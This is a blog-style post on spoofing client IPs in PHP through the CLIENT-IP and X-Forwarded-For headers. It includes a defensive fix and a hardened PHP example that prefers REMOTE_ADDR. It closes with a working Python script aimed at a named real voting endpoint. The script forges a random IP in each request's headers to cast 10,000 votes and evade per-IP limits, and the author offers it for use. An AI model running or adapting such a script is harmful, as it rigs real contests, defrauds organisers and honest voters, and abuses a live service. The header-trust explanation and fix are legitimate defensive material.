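Voting with Python and forging IP addresses

It's all because we're too poor and don't know the right people.

Project description

The problem with getting the client IP in PHP

This is how we usually write a function to get the IP: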

function GetIP(){
    // Every HTTP_* entry in $_SERVER is copied from a request header.
    if (!empty($_SERVER["HTTP_CLIENT_IP"])) {
        $cip = $_SERVER["HTTP_CLIENT_IP"];
    } elseif (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) {
        $cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
    } elseif (!empty($_SERVER["REMOTE_ADDR"])) {
        // Address of the TCP peer; only reached when both headers are absent.
        $cip = $_SERVER["REMOTE_ADDR"];
    } else {
        $cip = "0.0.0.0";
    }
    return $cip;
}

This is actually flawed: the IP can easily be changed through request headers:

$curl = curl_init();    // initialize a curl handle
curl_setopt($curl, CURLOPT_URL, "127.0.0.1/server.php");
$header = array( // build the request headers
    'CLIENT-IP:58.68.44.61',
    'X-FORWARDED-FOR:58.68.44.61',
);

curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);

$str = curl_exec($curl); // send the request
curl_close($curl); // close the curl handle
echo $str; // print the fetched response

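Solution:
When determining the IP, give $_SERVER["REMOTE_ADDR"] priority. REMOTE_ADDR is the address of the TCP connection's peer rather than a value read from a request header, so the client cannot change it by adding headers.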
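
A hardened counterpart to GetIP() that follows the fix above, as an added example that is not from the original post: REMOTE_ADDR decides, and X-Forwarded-For is consulted only when the peer is a listed reverse proxy. The function name getClientIp, the $trustedProxies parameter and the sample addresses are assumptions made for illustration.

```php
<?php
// Added example, not code from the original post.
// $trustedProxies and all sample addresses are constructed assumptions.

/**
 * Resolve the client IP with REMOTE_ADDR (the TCP peer) as the authority.
 * X-Forwarded-For is read only when that peer is a proxy we operate.
 */
function getClientIp(array $server, array $trustedProxies = []): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (filter_var($remote, FILTER_VALIDATE_IP) === false) {
        return '0.0.0.0';
    }
    // Direct or unknown peer: ignore CLIENT-IP and X-FORWARDED-FOR entirely.
    if (!in_array($remote, $trustedProxies, true)) {
        return $remote;
    }
    // Behind our proxy: walk the chain right to left. Entries appended by
    // trusted proxies sit on the right; anything left of the first
    // untrusted address was supplied by the client and is never used.
    $chain = explode(',', $server['HTTP_X_FORWARDED_FOR'] ?? '');
    foreach (array_reverse(array_map('trim', $chain)) as $hop) {
        if (filter_var($hop, FILTER_VALIDATE_IP) === false) {
            break; // malformed chain: fall back to the peer address
        }
        if (!in_array($hop, $trustedProxies, true)) {
            return $hop;
        }
    }
    return $remote;
}

// Case 1: direct request carrying the forged headers from the curl snippet.
$forged = [
    'REMOTE_ADDR'          => '203.0.113.7',
    'HTTP_CLIENT_IP'       => '58.68.44.61',
    'HTTP_X_FORWARDED_FOR' => '58.68.44.61',
];
echo getClientIp($forged), PHP_EOL;

// Case 2: request through hypothetical proxy 10.0.0.5, which appended the
// real peer (198.51.100.9) after the client's forged entry.
$viaProxy = [
    'REMOTE_ADDR'          => '10.0.0.5',
    'HTTP_X_FORWARDED_FOR' => '58.68.44.61, 198.51.100.9',
];
echo getClientIp($viaProxy, ['10.0.0.5']), PHP_EOL;
```

With an empty proxy list the function never reads a header, which is the right default for a server that clients reach directly.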

Python script

I'm a beginner, so please go easy on me.

import threading
import random
import socket
import struct
import requests
import json
import time

url = 'http://kepudasai.cdstm.cn/index.php?kepu-postvote'

data = {'group': 'gaozhongzu','key' : 10}

def createHeader():
    ip = socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff)))
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0',
        'CLIENT-IP': ip,
        'X-FORWARDED-FOR': ip
    }
    return headers

def toupiao():
    index = 0
    headers = createHeader();
    while True:
        html = requests.post(url, data=data, headers=headers)
        result = json.loads(html.text)
        if(result['error'] == 1):
            time.sleep(random.randint(1, 3))
            headers = createHeader();
        else:
            index += 1
        if(index == 10000):
            print index
            break

toupiao()